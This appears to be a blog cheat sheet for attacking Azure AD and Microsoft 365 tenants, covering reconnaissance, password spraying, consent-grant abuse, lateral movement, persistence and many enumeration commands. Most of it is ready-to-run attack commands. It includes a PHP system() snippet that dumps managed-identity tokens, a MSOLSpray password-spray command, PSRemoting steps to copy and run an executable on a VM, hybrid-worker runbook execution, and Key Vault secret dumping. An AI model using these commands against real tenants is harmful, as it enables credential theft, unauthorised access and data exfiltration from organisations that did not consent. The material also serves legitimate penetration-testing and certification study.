I. Reconnaissance (external)
Update useful tool: https://github.com/nyxgeek/o365recon
Find the subdomain of the target
Using microBurst
. \Invoke-EnumerateAzureSubDomains.ps1
Invoke-EnumerateAzureSubDomains -Base <target> -Verbose
enum email:
o365creeper.py -f emails.txt -o validemails.txt
II. Reconnaissance (internal)
Using RoadTool
roadrecon auth -u <Email> -p <Password>
roadrecon gather
roadrecon gui
Using StormSpotter
python ssbackend.pyz
quasar.cmd serve -p 9091 --history
Using Bloodhound, Azurehound
. C:\AzAD\Tools\AzureHound\AzureHound.ps1
PS C:\AzAD\Tools> Invoke-AzureHound -Verbose
III. Initial attack
Brute force
MSOLSpray.ps1
PS Invoke-MSOLSpray -UserList validemails.txt -Password test -Verbose
Illicit Consent Grant attack.
Using
IV. Lateral movement
Check env command, look at IDENTITY_HEADER and IDENTITY_ENDPOINT, dump token by this code:
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
Check Deployments
Get-AzResourceGroupDeployment -ResourceGroupName <Resource_group_name>
Save deployment template
Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <Resource_group_name> -DeploymentName <Deployment_Name>
VM interaction:
access the VM using PSRemoting
$password = ConvertTo-SecureString 'testpassword' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('testuser', $password)
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession -Session $sess
Transfer file:
Copy-Item -ToSession $sess -Path tests.exe -Destination C:\Users\ –Verbose
Excute a command:
Invoke-Command -Session $sess -ScriptBlock{ls C:\Users\}
Using hybridworker
List Automation Hybrid Wordker Group
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <> -ResourceGroupName
Import-AzAutomationRunbook -Name studentx -Path C:\AzAD\Tools\studentx.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Type PowerShell -Force -Verbose
Publish-AzAutomationRunbook -RunbookName studentx -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose
Start-AzAutomationRunbook -RunbookName studentx -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose
Dump PRT
Using PRT in chrome
Abuse Dynamic group
Abuse proxy application
Check azure connect, authentication type
Get-ADSyncConnector
Cloud to On-prem:
abuse PTA,
obtain PRT cookie
Readmore: https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/
Global Administrator or Intune Administrator role can execute
PowerShell scripts on an enrolled Windows device
On-prem to Cloud:
abuse PHS
V. Persistence
Add a new application that has high permissions and then use that for persistence
Useful command:
Login:
az login -u test@test.onmicrosoft.com -p testpassword
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzureAD -Credential $creds
Azurehound
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzAccount -Credential $creds
Connect-AzureAD -Credential $creds
.\AzureHound.ps1
Invoke-AzureHound -Verbose
Get all users
Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName => only get only UPNs
Show GAs
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
List all custom directory roles:
Import-Module AzureADPreview\AzureADPreview.psd1
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.com",$passwd)
Connect-AzureAD -Credential $creds
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} |select DisplayName
List resource (AzAD)
Get-AzResource
Get all the role assignments for the test user
Get-AzRoleAssignment -SignInName test@test.onmicrosoft.com
Get-AzRoleAssignment -Scope <Scope>
Check the definition of this role
Get-AzRoleDefinition -Name <Role_name>
List all the VMs where the current user has at least the Reader role
Get-AzVM | fl
or
az vm list
List all App Services. We filter on the bases of ‘Kind’ proper otherwise both appservices and function
apps are listed
Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
az webapp list (list web app service)
az webapp list --query "[].[name]" -o table (List only the names of app services)
To list Function Apps
Get-AzFunctionApp
list storage accounts
Get-AzStorageAccount | fl
az storage account list
is the readable keyvaults for the current user
Get-AzKeyVaultaz keyvault listGet-AzKeyVaultSecret -VaultName
Get-AzKeyVaultSecret -VaultName <VaultName> -Name <Container_name> –AsPlainText
Check if there is a user logged-in to az cli on that machine
az ad signed-in-user show
Check if there is a public IP address attached to the VM
Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_name> | select -ExpandProperty NetworkProfile
Get more details about the network interface attached to the VM using the below command
Get-AzNetworkInterface -Name <VM_interface>
Get the public IP address attached to the VM
Get-AzPublicIpAddress -Name <IP_name>
Get AzVM
Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_group_name> | fl *
Get information of the group and list principles
Get-AzADGroup -DisplayName <Group_name>
Enumerate the service principals in Azure AD and check the service principal that the AppID xx belong to
Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<App_id>"} | fl
Disconnect
Disconnect-AzAccount
Check if any extensions is already installed
Get-AzVMExtension -ResourceGroupName "Research" -VMName <VMName>
Run powershell on the VM from the powershell file
Invoke-AzVMRunCommand -VMName <VMName> -ResourceGroupName <ResourceGroupName> -CommandId 'RunPowerShellScript' -ScriptPath 'test.ps1' -Verbose
Nhat Truong Blog 